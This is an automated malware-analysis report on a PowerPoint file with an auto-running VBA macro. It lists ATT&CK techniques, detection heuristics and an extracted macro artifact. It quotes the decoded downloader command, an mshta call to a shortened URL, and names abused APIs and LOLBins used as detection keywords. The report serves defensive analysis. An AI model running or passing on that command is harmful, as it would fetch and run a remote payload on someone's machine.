MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is a PowerPoint presentation containing a VBA macro that is automatically executed upon opening. The macro uses a Shell() call and obfuscated string concatenation to construct and execute the command 'mshta http://j.mp/ajj9j9di3'. This command is likely used to download and execute a second-stage payload, indicating a downloader or dropper functionality.
Heuristics 5
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basadd48bb4524dbf57a6f1ada154b84427855297e94ea7a2e19492e918f2654f7a |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1941 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.